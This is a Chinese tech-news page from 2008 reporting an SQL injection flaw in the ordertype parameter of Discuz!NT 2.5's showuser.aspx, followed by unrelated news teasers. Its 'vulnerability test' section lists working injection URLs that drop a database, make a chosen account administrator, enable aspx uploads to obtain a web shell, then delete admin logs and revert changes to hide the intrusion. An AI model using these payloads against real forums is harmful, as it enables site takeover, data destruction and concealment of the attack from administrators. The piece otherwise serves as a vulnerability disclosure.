首页 > 传媒 > 关键词 > 管理最新资讯 > 正文

Discuz!NT 2.5爆注入漏洞 可获取管理权限

2008-08-29 14:17 · 稿源:站长之家用户投稿

核心提示:据国内安全组织ISTO近日检测发现,Discuz!NT 2.5出现注入漏洞,利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。

中国站长站(Chinaz.com)讯:据国内安全组织ISTO近日检测发现,Discuz!NT 2.5出现注入漏洞,利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。

漏洞说明:Discuz!NT 2.5 是康盛创想(北京)科技有限公司旗下的一款功能强大的基于 ASP.net 平台的社区软件。基于先进的 .Net Framework,默认支持 SQLServer数据库,可扩展支持Access、MySQL等多种数据库,支持IIS5、IIS6、IIS7,安全高效、稳定易用,充分发挥 ASP.net 特性,支持自由选择切换皮肤,支持多种其它论坛的数据转换。

Discuz!NT 2.5 强化论坛功能,提高速度和稳定性,负载能力也有显著改善,在此基础上还将提供包括商品交易、空间、相册等强大功能的插件包,供用户自由选择安装,体现出强大的伸缩扩展性。无论是从功能、性能,还是从支持环境等角度来看,都是目前最为完善和成熟 ASP.net 社区软件。但是ISTO成员在其中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限,从而控制整个网站。

漏洞厂商:http://www.comsenz.com

漏洞解析:在 Discuz!NT 2.5(20080826更新前)版本中showuser.aspx页面由于对ordertype变量没处理好!导致SQL注入,恶意攻击用户甚至不用注册账户,只要精心构造ordertype即可利用此漏洞。

漏洞测试:

http://www.*.com/bbs/showuser.aspx?ordertype=desc;drop database kj;--

http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='1',groupid='1' where username='webtets';--//更新为管理员

http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='aspx' where extension='jpg';-- //更新为aspx可上传

得到SHELL后...

http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='jpg' where extension='aspx';-- //更新回JPG

http://www.*.com/bbs/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username='webtets';-- //删除日志

http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='',groupid='' where username='webtets';--//取消管理员

免责声明:“站长之家”的传媒资讯页面文章、图片、音频、视频等稿件均为自媒体人、第三方机构发布或转载。如稿件涉及版权等问题,请与我们联系删除或处理。稿件内容仅为传递更多信息之目的,不代表本网观点,亦不代表本网站赞同其观点或证实其内容的真实性,更不对您的投资构成建议。我们不鼓励任何形式的投资行为、购买使用行为。

  • 相关推荐
  • 大家在看
  • 微软已修复Windows安装过程中的权限提升安全漏洞

    在WindowsSetup中存在一个安全漏洞,即安装操作系统功能更新时的过程中可使得经过本地认证的攻击者有可能利用提升的系统权限运行任意代码。该漏洞(CVE-2020-16908)可被利用来安装软件、创建新用户账户或干扰数据。

  • Linux 5.9.1以及部分旧版稳定内核已解决 "Bleeding Tooth"漏洞问题

    Linux5.9正式发布刚过去一周,修正版本的内核5.9.1就已经跟随而来,让这个稳定版本更值得关注的是包括了本周被Google与英特尔的安全人员公开及警告的"BleedingTooth"蓝牙漏洞的修复。BleedingTooth是一个影响Linux的远程代码执行漏洞,源于L2CAP代码中基于堆的类型混乱。

  • 云安全日报200929:云计算热门语言Python发现注入漏洞,需要尽快升级

    Python是一种跨平台的计算机程序设计语言。它结合了解释性、编译性、互动性和面向对象的诸多特性,最初设计用于编写自动化脚本,然而随着版本的不断更新和语言新功能的添加,越多被用于独立的、大型项目的开发。近些年,Python尤其在云计算,人工智能(AI)领域,应用十分广泛。不过最近Python爆出了比较严重的注入漏洞,需要尽快升级。以下是漏洞详情:漏洞详情CVE ID: CVE-2020-26116 CVSS评分: 5.0 中Python http.client(Pytho

  • 研究人员担心BleedingTooth蓝牙漏洞给Linux系统带来风险

    基于Linux的操作系统通常被认为比Windows等系统更安全,但这并不意味着它们完全没有安全问题。谷歌安全研究人员已经对Linux蓝牙堆栈中的一系列"零点击"漏洞发出警告。该漏洞被称为BleedingTooth,最坏的后果是带来远程代码执行攻击。

  • 木瓜移动厚积薄发 为创业板注入新鲜“血液”

    今年 4 月份《创业板改革并试点注册制总体实施方案》的发布,标志着创业板改革正式启动。创业板能成为培育优秀企业更好发展的沃土,帮助众多创新、创业型企业成长。作为互联网海外营销服务商木瓜移动正积极申请创业板,努力为中国的企业提供海外营销服务。木瓜移动申请创业板 招股书中显实力随着国内人口红利减弱,新兴的海外市场成为国内企业新的流量入口,成为跨境出海的最大驱动力;同时,国家政策的扶持和资本的注入也为国内企

  • 人事管理一般用什么管理系统?选择对了管理方便高效

    人事管理一般用什么管理系统?很多企业HR都在寻找适合自己企业的一套管理系统,但是在对比中越走越远;HR选择管理系统还是需要结合自身企业管理问题所在,当然小编也是建议能够寻找到一套系统多个功能使用,因为这样后期企业出现的管理问题基本可以靠一个平台就能完成了。随着企业的壮大,HR发现原有的人力资源管理方式已经跟不上企业发展速度,原本简单的算薪及考勤统计,无需花费过多时间就可以完成的日常事务,随着人员的扩张、

  • 亚马逊内鬼外泄营运资料 导致Marketplace卖家帐号权限被篡改

    美国法院上周对包括亚马逊前员工在内的6人提诉,指其向亚马逊员工行贿,以窜改Amazon Marketplace平台上第三方卖家及产品资料、以及外泄数TB内部营运资料,包括对手资料及亚马逊演算法以不法获利。Amazon Marketplace是供第三方卖家刊登、销售商品及服务给一般消费者的平台。根据美国西雅图地方法院文件,这6人有4人对外提供第三方卖家顾问服务,另两人为亚马逊前员工,随后也自立门户提供卖家顾

  • 云安全日报200930:IBM云管理解决方案发现任意执行代码漏洞,需要尽快升级

    IBM Cloud Orchestrator(以前是IBM SmartCloud Orchestrator)是IBM公司一套云管理解决方案。它为 IT 服务提供云管理功能,支持通过易于使用的界面管理公有云、私有云和混合云,使得企业可以整合本地数据中心资源,云业务流程和云服务的自动化部署。它可以为企业提供现成可用的模式和内容包,帮助企业加快配置和部署的速度。它将各种管理工具(例如,计量、使用、记账、监控和容量管理)集成到云服务中,并且在开发和测试应用后可

  • 《当“棋牌”遇上“电竞”》系列报道之三出谋献策:正能量注入新兴模式

    电子棋牌行业发展了二十余年后,迎来了新的十字路口。 当“棋牌+电竞”作为一种新的商业模式开始出现在电子棋牌行业,各界专家对此持何态度? 2020 年 8 月 18 日,第十二届创新中国论坛在北京市达美中心举行。论坛在“强化国家治理体系和治理能力建设”的宏大背景下,以“产业创新发展与治理体系建设”为主题,以文化产业中电子棋牌的商业模式创新即“棋牌+电竞”模式为切入点,探讨了如何构建现代化产业治理体系。 在这次论坛上

  • 苹果新设备客户可享三个月的Apple Arcade访问权限

    MacRumors报道称,购买新款iPhone、iPad、iPodtouch、AppleTV或Mac设备的苹果客户,将有资格获赠为期三个月的AppleArcade访问权限。作为苹果力推的一项游戏服务,该平台目前已有百余款无需额外付费、且没有应用内购买选项的游戏资源。通常情况下,这项服务的月费为4.99美元(约34RMB)。

  • ios14本地网络权限是干嘛的有什么用处 ios14新功能介绍

    ios14 本地网络权限是干嘛的?苹果在iOS14 中加入了更多保护用户隐私的功能,例如当APP用到手机相机、麦克风等工具时,iPhone都会做出相应的提示,以便让我们知道这些APP正在使用什么工具,是否会泄露我们的隐私。而很多尝鲜 iOS 14 的用户,在升级完成后会遇到 App 请求一个名叫「本地网络」的权限。那么这个功能到底有什么用呢?

  • 国际权威抗衰品牌奥尼之顿ONSTIN天猫国际旗舰店上线了!为抗衰老注入新活力!

    随着NMN成为2020上半年保健品领域的当红炸子鸡,身披“长生不老药”光环的NMN成为许多中国消费者争相抢购的最火保健品。随着NMN概念股在A股市场大放异彩,许多人第一次知道并开始了解这个产业,随着市场教育的深入,人们对于NMN的选择不再停留在表面和商家的自说自话。选择安全认证更高的膳食补充剂、美国SGS认证、选择吸收率超过98%的NMN产品、选择拥有核心研发实力的NMN等消费标准已经成为诸多消费者的共识。NMN产业步入品质发展时代

  • Twitter确认宕机,但没有证据表明存在网络攻击或安全漏洞

    据外媒报道,日前,许多Twitter用户突然无法访问该服务平台。虽然老Twitter用户还记得这个社交媒体网站的“failwhale(故障的鲸鱼)”经常出现的时候,但现阶段它通常是稳定的,最近一次重大问题则是因7月份的安全漏洞而出现过。

  • NVIDIA宣布NVIDIA DGX SuperPOD已就绪,可从全球认证合作伙伴处获取

    全球最先进的AI系统现可按照每20个节点为一个增量单元搭建;首批产品将在年底前安装到韩国、英国、瑞典和印度。加利福尼亚州圣克拉拉市 – GTC 2020秋季站 - 2020年10月5日 – NVIDIA今日发布企业版NVIDIA DGX SuperPODTM解决方案,这是全球首个一站式AI基础设施,能够让企业以惊人的速度安装功能强大的AI超级计算机——通常只需短短几周时间。已上市的DGX SuperPOD是由包含20个到140个独立的NVIDIA DGX A100TM系统构建的集群,现?

  • 谷歌和英特尔警告Linux中存在高严重的蓝牙安全漏洞

    谷歌和英特尔警告说,除了最新版本的Linux内核外,其他所有版本的Linux内核都存在高严重性蓝牙漏洞。谷歌的一位研究人员表示,该漏洞允许攻击者在蓝牙范围内无缝执行代码,而英特尔则将该漏洞定性为提供特权升级或信息泄露。

  • 赶紧更新!Firefox漏洞允许攻击者在同一WiFi劫持移动浏览器

    Mozilla已经修复了一个漏洞,攻击者可以使用该漏洞在同一个WiFi网络上劫持所有安卓版火狐浏览器,迫使用户访问恶意网站,比如钓鱼网页。

  • 微信2.5.0 for Mac发布 新增批量管理联系人功能

    不久前的PC版微信3.0中带来了通讯录批量管理功能,让不少用户十分欣喜,管理联系人时更加方便了。日前,Mac版微信2.5.0正式发布,也新增了这一功能。微信2.5.0 for Mac主要更新如下:1. 可以

  • NVIDIA收购ARM卡壳了:英国正考虑否决

    一月前,NVIDIA与ARM达成协议,前者将出资400亿美元从软银手中收购后者。本次交易虽然可以成为半导体历史上最大规模的收购案,但却因为涉及的利益面过于广泛,而阴影笼罩。据报道,英国方面

  • 倪光南院士:中国可能否决NVIDIA收购ARM!

    NVIDIA 400亿美元收购ARM,前所未有地震动了整个行业,尤其是在当下这个关键时刻,更是引发各方关注和争议。在第四届信息安全产业发展论坛上,中国工程院院士倪光南也谈到了这笔交易,并明确提

  • [图]微软发布两个紧急安全更新:修复远程代码执行漏洞

    今天微软发布了两个不定期的例外(Out-of-Band)安全更新,重点修复了WindowsCodecs库和VisualStudioCode应用中的安全问题。这两个例外安全更新是本月补丁星期二活动日之后再发布的,主要修复了两款产品中的“远程代码执行”漏洞,能够让攻击者在受影响的设备上远程执行代码。

  • 参与评论
文明上网理性发言,请遵守新闻评论服务协议
  • 热门标签